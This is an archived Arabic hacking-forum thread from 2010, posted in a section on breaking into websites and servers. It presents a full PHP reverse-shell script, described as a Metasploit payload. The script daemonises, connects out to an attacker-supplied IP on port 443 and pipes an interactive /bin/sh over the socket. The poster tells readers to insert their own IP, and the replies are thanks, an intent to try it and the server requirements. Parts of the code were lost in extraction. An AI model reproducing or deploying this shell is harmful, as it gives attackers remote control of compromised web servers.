:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   كود php للاتصال العكسي (البايلود الخاص بالميتاسبلوت) (http://www.vbspiders.com/vb/t30256.html)

KaLa$nikoV 06-09-2010 02:11 AM

كود php للاتصال العكسي (البايلود الخاص بالميتاسبلوت)
 
السلام عليكم

بالشرح تاع الاتصال العكسي الي عملته قبل فتره عملت جزء بتعلق بالميتا سبلوت

تمام

في مجال نختصر الاوامر الي عملناها بانا نستخرج الكون وعطيكم اياه جاهز وانتو الكم البقيه


وهاد الكود
كود PHP:

<?php 

    set_time_limit 
(0); 
    
$VERSION "1.0"
    
$ip 'IP';  // BURAYA KEND? ?P'niz.. 
    
$port 443;       // CHANGE THIS 
    
$chunk_size 1400
    
$write_a null
    
$error_a null
    
$shell 'uname-a; w; id; /bin/sh -i'
    
$daemon 0
    
$debug 0

    
// 
    // Daemonise ourself if possible to avoid zombies later 
    // 

    // pcntl_fork is hardly ever available, but will allow us to daemonise 
    // our php process and avoid zombies.  Worth a try... 
    
if (function_exists('pcntl_fork')) { 
       
// Fork and have the parent process exit 
       
$pid pcntl_fork(); 
        
       if (
$pid == -1) { 
          
printit("ERROR: Can't fork"); 
          exit(
1); 
       } 
        
       if (
$pid) { 
          exit(
0);  // Parent exits 
       


       
// Make the current process a session leader 
       // Will only succeed if we forked 
       
if (posix_setsid() == -1) { 
          
printit("Error: Can't setsid()"); 
          exit(
1); 
       } 

       
$daemon 1
    } else { 
       
printit("WARNING: Failed to daemonise.  This is quite common and not fatal."); 
    } 

    
// Change to a safe directory 
    
chdir("/"); 

    
// Remove any umask we inherited 
    
umask(0); 

    
// 
    // Do the reverse shell... 
    // 

    // Open reverse connection 
    
$sock fsockopen($ip$port$errno$errstr30); 
    if (!
$sock) { 
       
printit("$errstr ($errno)"); 
       exit(
1); 
    } 

    
// Spawn shell process 
    
$descriptorspec = array( 
       
=> array("pipe""r"),  // stdin is a pipe that the child will read from 
       
=> array("pipe""w"),  // stdout is a pipe that the child will write to 
       
=> array("pipe""w")   // stderr is a pipe that the child will write to 
    
); 

    
$process proc_open($shell$descriptorspec$pipes); 

    if (!
is_resource($process)) { 
       
printit("ERROR: Can't spawn shell"); 
       exit(
1); 
    } 

    
// Set everything to non-blocking 
    // Reason: Occsionally reads will block, even though stream_select tells us they won't 
    
stream_set_blocking($pipes[0], 0); 
    
stream_set_blocking($pipes[1], 0); 
    
stream_set_blocking($pipes[2], 0); 
    
stream_set_blocking($sock0); 

    
printit("Successfully opened reverse shell to $ip:$port"); 

    while (
1) { 
       
// Check for end of TCP connection 
       
if (feof($sock)) { 
          
printit("ERROR: Shell connection terminated"); 
          break; 
       } 

       
// Check for end of STDOUT 
       
if (feof($pipes[1])) { 
          
printit("ERROR: Shell process terminated"); 
          break; 
       } 

       
// Wait until a command is end down $sock, or some 
       // command output is available on STDOUT or STDERR 
       
$read_a = array($sock$pipes[1], $pipes[2]); 
       
$num_changed_sockets stream_select($read_a$write_a$error_anull); 

       
// If we can read from the TCP socket, send 
       // data to process's STDIN 
       
if (in_array($sock$read_a)) { 
          if (
$debugprintit("SOCK READ"); 
          
$input fread($sock$chunk_size); 
          if (
$debugprintit("SOCK: $input"); 
          
fwrite($pipes[0], $input); 
       } 

       
// If we can read from the process's STDOUT 
       // send data down tcp connection 
       
if (in_array($pipes[1], $read_a)) { 
          if (
$debugprintit("STDOUT READ"); 
          
$input fread($pipes[1], $chunk_size); 
          if (
$debugprintit("STDOUT: $input"); 
          
fwrite($sock$input); 
       } 

       
// If we can read from the process's STDERR 
       // send data down tcp connection 
       
if (in_array($pipes[2], $read_a)) { 
          if (
$debugprintit("STDERR READ"); 
          
$input fread($pipes[2], $chunk_size); 
          if (
$debugprintit("STDERR: $input"); 
          
fwrite($sock$input); 
       } 
    } 

    
fclose($sock); 
    
fclose($pipes[0]); 
    
fclose($pipes[1]); 
    
fclose($pipes[2]); 
    
proc_close($process); 

    
// Like print, but does nothing if we've daemonised ourself 
    // (I can't figure out how to redirect STDOUT like a proper daemon) 
    
function printit ($string) { 
       if (!
$daemon) { 
          print 
"$string\n"
       } 
    } 

    
?>


عند 'IP';
ضع اي بي جهازك
الحقيقي

عند port ضع البورت الي بدك تتصل منه

موفقين

D-GhosT s3cur!Ty-Z 06-09-2010 03:02 AM

مشكور فالكون مبدع كالعادة smilies14

مع انني موفاهم شيءلوول:12::sossa:

ThE BiGeSt JoKeR 06-09-2010 08:24 PM

روووعه فالكونو ^^

عنجد شيء راائع .. يعني صار لك تتعلم شوي شوي :)


موضوع راائع و مفييد

الى اللقاء ^^

Zero 06-09-2010 09:46 PM

smilies14

z3r0 b0mb3r 06-10-2010 07:31 PM

مشكوررررررررررررررررررررررررررر أخي بارك الله فيك
تحياتي

h1kt0s4 06-10-2010 08:23 PM

يسلم قلبك بركان ع السكربت جآري التجربه

R.B.G.ALORD 06-11-2010 08:46 PM

مشكور اخوي بارك الله فيك مبدع صدقا هذا الكود يستفيد الجميع منه ارجو تثبيت موضوعك من المشرفين مواضيعك فوق رائعه مني لك احلى تحية عبود

megainfo 06-11-2010 09:59 PM

Thanks brother
but

it required
- PEAR should be installed
AND
- PCNTL module
AND

- socket extension should be enabled in php server


:)


الساعة الآن 11:59 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0